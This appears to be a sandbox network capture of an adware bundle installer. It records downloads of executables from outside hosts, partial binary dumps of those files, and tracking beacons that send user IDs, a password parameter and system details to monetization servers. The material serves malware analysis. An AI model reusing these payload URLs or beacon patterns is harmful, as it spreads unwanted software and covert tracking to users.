.y..$t)@........*)'.....b.p.......(l)V......uCh.C....8..(.............
...V...,.X..,..k..u.XC/......Z7...O.....2......S..e......... ...W.1...
f...e~..#......O.[.....,.]o.4...`...cr..n..*....).Swu.a..



GET /10870.ashx?e=NEjPoAxksx39yuFJumnxsjn4eNYQ9SOWQF3UKsSdb2t7HO4WybUyR1UeQGsGyqMalvCEtd9tAC4n5kT0ibNwlGAqR2XPWVGhv0BJaho5/afQlB3kfGAhd7KfjViNnCJbBPFyFq4etD2F1daz2AcKxastnHeKqEA5dKHj74dJ/dwoDd7hh3KMfQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:42 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400136&SBPIDS=1&KA=1 HTTP/1.1
User-Agent: CoreWinInet
Host: online.GOOBZO.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=vkmfd445f45dw155tpmcir55


HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 1266
Content-Type: text/html; charset=utf-8
Location: hXXp://online.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400136&SBPIDS=1&KA=1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 18 Apr 2015 23:35:36 GMT
Connection: close
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://onlin
e.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&U
serID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&O
S=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c
3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&a
mp;PartnerList=&ElapsedTime=1429400136&SBPIDS=1&KA=1">h
ere</a>.</h2>..</body></html>....<!DOCTYPE 
html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.or
g/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://w
ww.w3.org/1999/xhtml" >..<head><title>...Untitled Page.
.</title></head>..<body>..    <form name="form1" 
method="post" action="ka.aspx?CV=2.0.0.0&ProductID=12000&UserI
D=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10
&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-9
9df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&P
artnerList=&ElapsedTime=1429400136&SBPIDS=1&KA=1" id="form
1">..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" va
lue="/wEPDwUJNzgzNDMwNTMzZGR2ZsAnoxOCObOpC82NfSRA21X80Q==" />..    
<div>..    ..    </div>..    </form>..</body>.
.</html>....
<<< skipped >>>


GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=587412-
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: application/octet-stream
Content-Length: 83916
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:16 GMT
Cache-Control: max-age=259200
Content-Range: bytes 587412-671327/671328
MMMMMUuzt.............................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......(... ...@...............................~r......YRO..M"..M"..M".
.O$..S(..S).xH0.~L3.wG0.wH0.rE..xI1..YB.\TP.XRO..K...N!..O"..N"..N"..O
$.xI0.pE..ZSO..h:[email protected][email protected]_]..F...E..
.C...D...E...C...n5..l6..f>...n...s.[TO..L...I...J...I...s-..r...p0
..o1...j..._...k...l...m.ZTO..Y...K...I...w*..v,...h...i..i...Y...S...
{$..z&..x'...e...f..m...k...l...m...n...o...n...j...m...k...q...}....$
...*...*...7...?...D...;[email protected]...
............{...z...{...z...u.........................................
...............!.......$...!...&...'...*... ...-...*.../.../...3...3..
.5...6...5...7...7...8...;...=...?...7...V...p.....^][................
......................................................................
....j..........ttt.```................................................
..................................................................
<<< skipped >>>


GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=251748-
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: application/octet-stream
Content-Length: 419580
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:16 GMT
Cache-Control: max-age=259200
Content-Range: bytes 251748-671327/671328
F......u,....... ;.t........@;[email protected].(i..Y.F.....W.......F.
.>.H....N. . ..N...~.WP.u...v......E..N.. .F..=....M....t....t.....
..............I......H..@. t.Sj.j.Q.Jz..#.......t-.F..].f....j..E.P.u.
...].f.]...u......E.9}.t..N. .........%...._[^....U..........f9E......
.SV.u..M.......u..N.3.;.u..E..H.f...w.f.. ....K.....j.f9E.s..u......Y.
...E.Yt,........... .U.Rj..U.RPQ............E.t...E.8].t..M..ap.^[..3.
PPj.Pj.h...@h..G....pG....H.....H....t....t.P...pG....U.....SV.u..M...
....]......;.sT.M........~..E.Pj.S.z....M...............X.....t.......
..........}..t..E..`p.........E........~1.]..}...E.P.E.%....P.....YY..
t..E.j..E..]..E..Y...-.....*...3..]..E..A.E.j..p..U.j.RQ.M.QV.p..E.P.h
.....$....o........E.t...M.......}..t..M..ap.^[....U...=..H..u..E..H..
..w... ].j..u......YY]...U....<S.u..M.......M..E.3.;.t...;.u%.x....
..........8].t..E..`p.3.3..O...9].t..}..|..}.$....V.u.W.]..]..M..x....
....~..E.P..E.j.P......u........E..........A...;.t....E.G...}.-.}.u..M
.....}. u...G.}..E.j.Y9].u%.}.0t..E......7..<xt.<Xt..E......$.M.
9M.u..}.0u...<xt.<Xu..G.....E..}..E..R..Wj.j..U.......]........M
..E..U..M.......C.....t.....u(.L$..D$.3......D$........d$......d$....G
...L$..T$..D$...........u......d$....D$.....r.;T$.w.r.;D$.v.N D$..T$.3
. D$..T$.My..................Ou........]^_......@s... s.........3.....
..3.3....U...E..M.%....#.V.u.......t$..t.j.j......YY.......j.^.0.H....
...P.u...t...............YY3.^]...U...E...~.P.u......YY.u..u.P.u..u..u
....qG.]...U....8.T.H.3..E..E..M..M...H.S.........M..H..M..H......
<<< skipped >>>


GET /windowspm/up?ptid=wpmvt&sid=WindowsMangerProtect&ln=en_us&ver=20.0.0.1953&uid=&upv= HTTP/1.1
Host: VVV.theviilage.com
User-Agent: Mozilla/4.0  
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:37:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
1..1..0..



GET /webplayer/appshat/config.json HTTP/1.1
Accept: */*
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Cache-Control: max-age=0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.bigspeedpro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:36:39 GMT
Content-Type: application/json
Content-Length: 778
Last-Modified: Mon, 27 Jan 2014 15:16:30 GMT
Connection: close
ETag: "52e6784e-30a"
Accept-Ranges: bytes
{.."group-name": "AppsHat",.."program-name": "AppsHat",.."about-text":
 "Apps Hat\n(c) 2013 Somoto Ltd. All rights reserved\n\nTerms and Cond
itions:\nhXXp://VVV.appshat.com/eula/ahd\n\nPrivacy Policy:\nhXXp://ww
w.appshat.com/privacy/ahd",.."title-icon": "hXXp://VVV.appshat.com/ima
ges/16x16.ico",.."tray-icon": "hXXp://VVV.appshat.com/images/16x16.ico
",.."shortcut-icon": "hXXp://VVV.appshat.com/images/64x64.ico",.."unin
stall": "Apps Hat",.."url": "hXXp://VVV.appshat.com/home",.."width": 1
024,.."height": 795,.."cache": 86400,.."alwaysontop": false,.."program
-version": "2.13",.."start-on-windows": true,.."title": "Apps Hat",.."
tooltip": "Apps Hat",.."minimized": true,.."update-url" : "hXXp://VVV.
bigspeedpro.com/mirror/nerocrossrider/appshatmini/appshatmini_update.e
xe"..}....



GET /app/ping.ashx?e=lOCrbsNL2zVPNjxRBLtb46Du3SqXTq58t8f6YpiR28IQ9XpMu3JNONKN/VUSdNXb6lcFzkAHUgF82tgewNDgDyZMAOD3mcq6qIs V7Ds6CRuZZIi5/tojmg8l4itKbh/HiBn688lkcr8toCm18jzwzsvB25MJtnS1urDxSq54gttr9SYvZpGaeXM3AOyMolLPBrSiXJp6zDwzjuB3V4QuM0FiFjdakeNbnZd8xqzln9nWpr61EGbEgSa6Z efd4uyZD6A1psf2ya3UsgcT0aYJHseVKQaMUz7BRPf4VdiaQvtCk0QnWPYVQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykprwLn5Ljfu1FSnkSnlVgA Q== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: repjs.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:42 GMT
Content-Length: 0
....


GET /app/ping.ashx?e=eFCD8T/coiezrE/yDXLQyeSrE0ez3DjNAMrIyXaDBdMicvsFwQStECv5F5wArPI/YCpHZc9ZUaG4NIBMq aAlALMEicbqKjXqIs V7Ds6CRuZZIi5/tojmg8l4itKbh/HiBn688lkcr8toCm18jzwzsvB25MJtnS1urDxSq54gttr9SYvZpGaeXM3AOyMolLPBrSiXJp6zDwzjuB3V4QuM0FiFjdakeNbnZd8xqzln9nWpr61EGbEgSa6Z efd4uyZD6A1psf2ya3UsgcT0aYJHseVKQaMUz7BRPf4VdiaQvtCk0QnWPYVQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykprwLn5Ljfu1FSnkSnlVgA Q== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: repjs.shopper-pro.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:42 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/7.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:42 GMT..Content-Length: 0..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9+WQCtWAQU1A1lP3q9NMb+R+dMDcC98t4Vq3ECECVRccvD8Qb29B4D63fPT+k= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.thawte.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1396
content-transfer-encoding: binary
Cache-Control: max-age=446093, public, no-transform, must-revalidate
Last-Modified: Fri, 17 Apr 2015 03:30:03 GMT
Expires: Fri, 24 Apr 2015 03:30:03 GMT
Date: Sat, 18 Apr 2015 23:38:34 GMT
Connection: keep-alive
0..p......i0..e.. .....0.....V0..R0......Qw.}`[email protected]
7033003Z0s0q0I0... ........l....r.vdv0..*.~Y..X....e?z.4..G.L.......q.
.%Qq.........w.O.....20150417033003Z....20150424033003Z0...*.H........
......<.t.72.....&.Rtn....} ....-G....... ...9...E...M.I.E..:...M.=
.8v..*.b.Ê[email protected]....[(j..K.
t.d.....!.....j.....(f.C*. I.......N.....rU.x.U..9.9$..L..|(t.w-aR<
.0,(..'L$ ...L..[.......v.......w{{.w)s...i.d~.....M...;~....0...0...0
..y.......^..........N...)0...*.H........0J1.0...U....US1.0...U....Tha
wte, Inc.1$0"..U....Thawte Code Signing CA - G20...150303000000Z..1506
01235959Z0Y1.0...U....US1.0...U....Thawte, Inc.1301..U...*Thawte Code 
Signing CA - G2 OCSP Responder0.."0...*.H.............0............).Z
.......O.~.l...,\.3.".'.'W .ih./..}OA...K...HJd....K^..<.....-.rWJ.
j.U.._......W.../.6....J.y.u-.\...2..U.52B.>...=F...RbR.y.zm.......
{b.bj....Y..J..m...*=.^......V.}p......rmA......9.L ...{?.g.-Y........
....8...k.$.:.5..6#4..F.#....t.B.8.O)'F.p).........d0b0...U....0.0...U
.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U..
..TGV-B-32450...*.H..............C.....8.Aw.{....`...y1N...W4M..M.J.3~
..7#}..X..:x..5....$...Z^%.?6..e...}I.)....... .A.w......_...B..j.T..Y
u.o.....g....H....q.Ju.SA`K.....~..O_.....S....I>..O.X..E.......]..
.y..L..F....K......../...._XSk6.:a};.?`...:^.....p....4Z.3L;.......t..
..>.....j....
<<< skipped >>>


GET /css?family=Abel HTTP/1.1
Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: fonts.googleapis.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/css
Timing-Allow-Origin: *
Expires: Sat, 18 Apr 2015 23:36:39 GMT
Date: Sat, 18 Apr 2015 23:36:39 GMT
Cache-Control: private, max-age=86400
Content-Length: 155
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alternate-Protocol: 80:quic,p=1
@font-face {.  font-family: 'Abel';.  font-style: normal;.  font-weigh
t: 400;.  src: url(hXXp://fonts.gstatic.com/s/abel/v6/3YEwT2a1878zysq9
2S8_9w.eot);.}.HTTP/1.1 200 OK..Content-Type: text/css..Timing-Allow-O
rigin: *..Expires: Sat, 18 Apr 2015 23:36:39 GMT..Date: Sat, 18 Apr 20
15 23:36:39 GMT..Cache-Control: private, max-age=86400..Content-Length
: 155..X-Content-Type-Options: nosniff..X-Frame-Options: SAMEORIGIN..X
-XSS-Protection: 1; mode=block..Server: GSE..Alternate-Protocol: 80:qu
ic,p=1..@font-face {.  font-family: 'Abel';.  font-style: normal;.  fo
nt-weight: 400;.  src: url(hXXp://fonts.gstatic.com/s/abel/v6/3YEwT2a1
878zysq92S8_9w.eot);.}...



GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=419580-
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: application/octet-stream
Content-Length: 251748
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:16 GMT
Cache-Control: max-age=259200
Content-Range: bytes 419580-671327/671328
.<...Q..8...QRP.0>.... ......^]..u...4...Q..0...QRP..>....(..
....^].-rF.?rF.hrF..rF..rF..rF..rF.=sF.QrF..sF.........U..V.u.........
...Z=..............0.....4...^]..U...E..M..U.............].......U...E
..M..U.............].......U...U...|!.M.....r..E.......@............].
.E............................]......U...U...|!.M.....r..E....... ....
........]..E............................]......U.........T.H.3..E..E.S
VW.8..............3...t.....x.....d.....h.....l.....p.....\.....`.....
T.....X.....P.......;...U. .4......U..E. .0....E..5P.G..E............`
........E..U........z....................M..U..m.... .................
.......z....................E..M..m....................9.......j....M.
..P.............9M.|....U.;U.v..E..M....E....P....E....T..............
.......................}...I.........|..........U....E......E.........
.......M.RPQV..:........E...u.......u....P....M. ..P......T......T....
.|....].x-..=7.A.v$..|....E..5H.H.....................^j.h....SP.Z*...
......RPSQ..................2........................;.|...;.w........
................................tk............R......Q......R......Q..
....R......Q......R......QR......$..t.h4.H.W..=....._..^[.M.3........]
.........t].............. .\$........\$........\$.........$Q......$..t
.h4.H.W.u=....._..^[.M.3........]...P............xF................t.Q
P..0...h..H.P..........0...h`.H.Q........................ ............
....................................PQVS.......\.....`.....|[.....'..v
.j.jdVS.....R......P.......#..|2....t,............j.jdQR.2(..VSRP.
<<< skipped >>>


GET /monetization.gif?event=4&ibic=f1455de99fbc9c9080e7ed2fd747836eIE&verifier=b2eb32d323f5359842a735827d51a4f5&campaign=000171&country=ua&app=70121&os=7(64bit)&defbro=ie&chver=41.0.2272.118&ffver=29.0.1&iever=10.0.9200.16521&starttime=1429400147&asw=0_1073750533_-2147475456_2048&browser=ff&rnd=1429400147 HTTP/1.1
Host: logs.neomapobjectrack.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:03 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1429400163.dop013.am4.t,1429400163.cds058.am4.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Sat, 18 Apr 
2015 23:36:03 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-A
live..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07
 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 
35..Content-Type: image/gif..X-HW: 1429400163.dop013.am4.t,1429400163.
cds058.am4.c..GIF89a.............,...........D..;..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1552
content-transfer-encoding: binary
Cache-Control: max-age=481760, public, no-transform, must-revalidate
Last-Modified: Fri, 17 Apr 2015 13:24:57 GMT
Expires: Fri, 24 Apr 2015 13:24:57 GMT
Date: Sat, 18 Apr 2015 23:38:50 GMT
Connection: keep-alive
0..........0..... [email protected]
7132457Z0s0q0I0... .........z`.V.<N.v...TM)(.r...L_.6....a"I9....J.
8........c..uU..$.;.....20150417132457Z....20150424132457Z0...*.H.....
........Y.4.<..&r.....&.>'.TqX.E...*...............Lp3.p.MU..^..
...!e4.xN..1u.#.ox.....5.....j....&.....E...H=}..S....l..5{.........BO
.......8[.~2:[}..W.SVd.y..%\f.x.op...]uE..W0.......}.. .S..Fp..".....:
Iw ....M.....9l.>G.........;.#.>.B..... h...&.4.dARH..8(...r...5
0..10..-0..........y.P}~.EY....T]. 0...*.H........0..1.0...U....US1.0.
..U....VeriSign, Inc.1<0:..



GET /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?4124f9eb17acfe32 HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 16:17:41 GMT
If-None-Match: "804047d4e66d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: ctldl.windowsupdate.com


HTTP/1.1 304 Not Modified
Content-Type: application/octet-stream
Last-Modified: Tue, 24 Mar 2015 16:17:41 GMT
ETag: "804047d4e66d01:0"
Cache-Control: max-age=86400
Date: Sat, 18 Apr 2015 23:37:51 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/octet-stream..Las
t-Modified: Tue, 24 Mar 2015 16:17:41 GMT..ETag: "804047d4e66d01:0"..C
ache-Control: max-age=86400..Date: Sat, 18 Apr 2015 23:37:51 GMT..Conn
ection: keep-alive..



GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 24 Mar 2015 05:02:25 GMT
If-None-Match: "a1132b8ef65d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Tue, 24 Mar 2015 05:02:25 GMT
ETag: "a1132b8ef65d01:0"
Cache-Control: max-age=900
Date: Sat, 18 Apr 2015 23:38:22 GMT
Connection: keep-alive
....


GET /pki/crl/products/WinPCA.crl HTTP/1.1


Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 07 Mar 2015 06:01:44 GMT
If-None-Match: "dde36a309c58d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Sat, 07 Mar 2015 06:01:44 GMT
ETag: "dde36a309c58d01:0"
Cache-Control: max-age=900
Date: Sat, 18 Apr 2015 23:38:22 GMT
Connection: keep-alive
....


GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1


Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 05 Mar 2015 06:01:35 GMT
If-None-Match: "cf2633d6957d01:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com


HTTP/1.1 304 Not Modified
Content-Type: application/pkix-crl
Last-Modified: Thu, 05 Mar 2015 06:01:35 GMT
ETag: "cf2633d6957d01:0"
Cache-Control: max-age=900
Date: Sat, 18 Apr 2015 23:38:23 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/pkix-crl..Last-Mo
dified: Thu, 05 Mar 2015 06:01:35 GMT..ETag: "cf2633d6957d01:0"..Cache
-Control: max-age=900..Date: Sat, 18 Apr 2015 23:38:23 GMT..Connection
: keep-alive..



GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=0-
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 1286329
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 08:26:05 GMT
Content-Range: bytes 0-1286328/1286329
X-Cache: RefreshHit from cloudfront
Via: 1.1 8cfbf4c767639172e44be33e20bf67be.cloudfront.net (CloudFront)
X-Amz-Cf-Id: PGv0uslboAetijTtHnMlTXHG7Ny0pzD9ncBus0b3x3J7ssHR8xVRuw==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s....................
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:36:29 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Sat, 18
 Apr 2015 23:36:29 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..



GET /v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.wpm HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:36:21 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.59 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:36:21 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.59 ms","message":"store 1 ac
tion and 0 update "}..0......


GET /v4/sof-installer/267123711_198339_B48A115F?action=smt.installer.istartsurf.ient HTTP/1.1


Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com


HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 18 Apr 2015 23:36:23 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.58 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/0.7.67..Date: Sat, 18 Apr 20
15 23:36:23 GMT..Content-Type: text/html; charset=utf-8..Transfer-Enco
ding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api
-version: v4..48..{"stats":"ok","time":"0.58 ms","message":"store 1 ac
tion and 0 update "}..0..



GET /online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400136&SBPIDS=1&KA=1 HTTP/1.1
User-Agent: CoreWinInet
Host: online.speedbit.com
Cache-Control: no-cache
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: close
Date: Sat, 18 Apr 2015 23:35:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, no-store
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ounjmtawx5z3mav20cahyjnt; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44
<RESULT>.<LASTERROR>0</LASTERROR>.</RESULT>...



GET /16669.ashx?e=aL/yzOcQGPn9yuFJumnxstwPQrKZIHXEQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 75u4m722PKD2/M8jJQIzSfeAVcyDPrG1hQC drCF7eFHh/LPABvBAscXPNbtq4ApuOFLk2t6neQ zLrLpIjsRUUyPhomD4IBnRzaRAF2XbeBAdSiYySX1ABO9CgPGV4WwPGAmcePe PU/67/t1IJfTYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW T5OeSwUDdvavnoSbOw/pQBUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKaddObvDIFYW HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
